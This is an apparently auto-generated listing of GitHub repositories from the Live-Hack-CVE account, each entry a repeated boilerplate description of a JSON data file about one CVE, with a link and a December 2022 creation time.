**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32941 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32941](https://github.com/Live-Hack-CVE/CVE-2022-32941) create time: 2022-12-24T01:19:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3797 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3797](https://github.com/Live-Hack-CVE/CVE-2022-3797) create time: 2022-12-24T01:19:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32940 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32940](https://github.com/Live-Hack-CVE/CVE-2022-32940) create time: 2022-12-24T01:19:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-2727 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-2727](https://github.com/Live-Hack-CVE/CVE-2007-2727) create time: 2022-12-23T23:16:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-9709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-9709](https://github.com/Live-Hack-CVE/CVE-2014-9709) create time: 2022-12-23T22:28:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3515](https://github.com/Live-Hack-CVE/CVE-2014-3515) create time: 2022-12-23T22:28:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-3735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-3735](https://github.com/Live-Hack-CVE/CVE-2016-3735) create time: 2022-12-23T23:13:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20052](https://github.com/Live-Hack-CVE/CVE-2017-20052) create time: 2022-12-23T23:19:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3282 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3282](https://github.com/Live-Hack-CVE/CVE-2018-3282) create time: 2022-12-23T22:30:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19051 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19051](https://github.com/Live-Hack-CVE/CVE-2019-19051) create time: 2022-12-23T23:16:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19044](https://github.com/Live-Hack-CVE/CVE-2019-19044) create time: 2022-12-23T23:16:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19057](https://github.com/Live-Hack-CVE/CVE-2019-19057) create time: 2022-12-23T23:16:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19053 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19053](https://github.com/Live-Hack-CVE/CVE-2019-19053) create time: 2022-12-23T23:16:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19063 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19063](https://github.com/Live-Hack-CVE/CVE-2019-19063) create time: 2022-12-23T23:15:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-8921 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-8921](https://github.com/Live-Hack-CVE/CVE-2019-8921) create time: 2022-12-23T23:14:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3816](https://github.com/Live-Hack-CVE/CVE-2019-3816) create time: 2022-12-23T23:12:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-8922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-8922](https://github.com/Live-Hack-CVE/CVE-2019-8922) create time: 2022-12-23T23:12:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3810 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3810](https://github.com/Live-Hack-CVE/CVE-2019-3810) create time: 2022-12-23T23:12:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3804](https://github.com/Live-Hack-CVE/CVE-2019-3804) create time: 2022-12-23T23:12:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3848 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3848](https://github.com/Live-Hack-CVE/CVE-2019-3848) create time: 2022-12-23T23:12:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3847 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3847](https://github.com/Live-Hack-CVE/CVE-2019-3847) create time: 2022-12-23T23:12:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10149](https://github.com/Live-Hack-CVE/CVE-2019-10149) create time: 2022-12-23T23:12:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17670 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17670](https://github.com/Live-Hack-CVE/CVE-2019-17670) create time: 2022-12-23T23:12:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10135](https://github.com/Live-Hack-CVE/CVE-2019-10135) create time: 2022-12-23T23:11:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10210 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10210](https://github.com/Live-Hack-CVE/CVE-2019-10210) create time: 2022-12-23T23:11:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3887 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3887](https://github.com/Live-Hack-CVE/CVE-2019-3887) create time: 2022-12-23T23:11:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10206](https://github.com/Live-Hack-CVE/CVE-2019-10206) create time: 2022-12-23T23:11:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14818](https://github.com/Live-Hack-CVE/CVE-2019-14818) create time: 2022-12-23T23:11:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14825](https://github.com/Live-Hack-CVE/CVE-2019-14825) create time: 2022-12-23T23:09:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14885](https://github.com/Live-Hack-CVE/CVE-2019-14885) create time: 2022-12-23T23:09:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14886](https://github.com/Live-Hack-CVE/CVE-2019-14886) create time: 2022-12-23T23:09:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14855](https://github.com/Live-Hack-CVE/CVE-2019-14855) create time: 2022-12-23T23:09:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19052](https://github.com/Live-Hack-CVE/CVE-2019-19052) create time: 2022-12-23T23:08:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19061](https://github.com/Live-Hack-CVE/CVE-2019-19061) create time: 2022-12-23T23:08:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19060](https://github.com/Live-Hack-CVE/CVE-2019-19060) create time: 2022-12-23T23:08:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18899 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18899](https://github.com/Live-Hack-CVE/CVE-2019-18899) create time: 2022-12-23T23:08:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10800](https://github.com/Live-Hack-CVE/CVE-2019-10800) create time: 2022-12-23T23:07:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19054 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19054](https://github.com/Live-Hack-CVE/CVE-2019-19054) create time: 2022-12-23T22:37:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6706 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6706](https://github.com/Live-Hack-CVE/CVE-2019-6706) create time: 2022-12-23T22:35:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24771](https://github.com/Live-Hack-CVE/CVE-2020-24771) create time: 2022-12-23T23:17:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13882 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13882](https://github.com/Live-Hack-CVE/CVE-2020-13882) create time: 2022-12-23T23:17:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24987 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24987](https://github.com/Live-Hack-CVE/CVE-2020-24987) create time: 2022-12-23T23:17:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20248 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20248](https://github.com/Live-Hack-CVE/CVE-2020-20248) create time: 2022-12-23T23:17:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17541](https://github.com/Live-Hack-CVE/CVE-2020-17541) create time: 2022-12-23T23:17:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25637 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25637](https://github.com/Live-Hack-CVE/CVE-2020-25637) create time: 2022-12-23T23:14:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21365 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21365](https://github.com/Live-Hack-CVE/CVE-2020-21365) create time: 2022-12-23T23:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25718 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25718](https://github.com/Live-Hack-CVE/CVE-2020-25718) create time: 2022-12-23T23:13:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14339](https://github.com/Live-Hack-CVE/CVE-2020-14339) create time: 2022-12-23T23:13:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14378 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14378](https://github.com/Live-Hack-CVE/CVE-2020-14378) create time: 2022-12-23T23:10:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14306 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14306](https://github.com/Live-Hack-CVE/CVE-2020-14306) create time: 2022-12-23T23:10:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25644 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25644](https://github.com/Live-Hack-CVE/CVE-2020-25644) create time: 2022-12-23T23:10:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25689 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25689](https://github.com/Live-Hack-CVE/CVE-2020-25689) create time: 2022-12-23T23:10:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25699](https://github.com/Live-Hack-CVE/CVE-2020-25699) create time: 2022-12-23T23:10:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14370 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14370](https://github.com/Live-Hack-CVE/CVE-2020-14370) create time: 2022-12-23T23:10:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10781](https://github.com/Live-Hack-CVE/CVE-2020-10781) create time: 2022-12-23T23:10:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1706 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1706](https://github.com/Live-Hack-CVE/CVE-2020-1706) create time: 2022-12-23T23:09:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1707](https://github.com/Live-Hack-CVE/CVE-2020-1707) create time: 2022-12-23T23:09:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1709](https://github.com/Live-Hack-CVE/CVE-2020-1709) create time: 2022-12-23T23:09:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10684 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10684](https://github.com/Live-Hack-CVE/CVE-2020-10684) create time: 2022-12-23T23:08:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6625 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6625](https://github.com/Live-Hack-CVE/CVE-2020-6625) create time: 2022-12-23T23:08:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2091 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2091](https://github.com/Live-Hack-CVE/CVE-2020-2091) create time: 2022-12-23T23:08:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6624 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6624](https://github.com/Live-Hack-CVE/CVE-2020-6624) create time: 2022-12-23T22:37:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12865](https://github.com/Live-Hack-CVE/CVE-2020-12865) create time: 2022-12-23T22:37:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12863 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12863](https://github.com/Live-Hack-CVE/CVE-2020-12863) create time: 2022-12-23T22:37:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14334 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14334](https://github.com/Live-Hack-CVE/CVE-2020-14334) create time: 2022-12-23T22:37:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12862](https://github.com/Live-Hack-CVE/CVE-2020-12862) create time: 2022-12-23T22:37:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24223](https://github.com/Live-Hack-CVE/CVE-2020-24223) create time: 2022-12-23T22:37:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39473 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39473](https://github.com/Live-Hack-CVE/CVE-2021-39473) create time: 2022-12-23T23:17:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39432](https://github.com/Live-Hack-CVE/CVE-2021-39432) create time: 2022-12-23T23:17:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20217](https://github.com/Live-Hack-CVE/CVE-2020-20217) create time: 2022-12-23T23:17:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20213](https://github.com/Live-Hack-CVE/CVE-2020-20213) create time: 2022-12-23T23:17:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29922](https://github.com/Live-Hack-CVE/CVE-2021-29922) create time: 2022-12-23T23:16:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34620](https://github.com/Live-Hack-CVE/CVE-2021-34620) create time: 2022-12-23T23:16:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41183 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41183](https://github.com/Live-Hack-CVE/CVE-2021-41183) create time: 2022-12-23T23:16:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43400 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43400](https://github.com/Live-Hack-CVE/CVE-2021-43400) create time: 2022-12-23T23:15:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41184 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41184](https://github.com/Live-Hack-CVE/CVE-2021-41184) create time: 2022-12-23T23:15:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41182 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41182](https://github.com/Live-Hack-CVE/CVE-2021-41182) create time: 2022-12-23T23:15:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41229](https://github.com/Live-Hack-CVE/CVE-2021-41229) create time: 2022-12-23T23:14:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40776](https://github.com/Live-Hack-CVE/CVE-2021-40776) create time: 2022-12-23T23:14:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22939 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22939](https://github.com/Live-Hack-CVE/CVE-2021-22939) create time: 2022-12-23T23:13:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40330](https://github.com/Live-Hack-CVE/CVE-2021-40330) create time: 2022-12-23T23:13:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3807](https://github.com/Live-Hack-CVE/CVE-2021-3807) create time: 2022-12-23T23:13:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45342 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45342](https://github.com/Live-Hack-CVE/CVE-2021-45342) create time: 2022-12-23T23:13:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32478](https://github.com/Live-Hack-CVE/CVE-2021-32478) create time: 2022-12-23T23:13:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45343 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45343](https://github.com/Live-Hack-CVE/CVE-2021-45343) create time: 2022-12-23T23:13:25Z

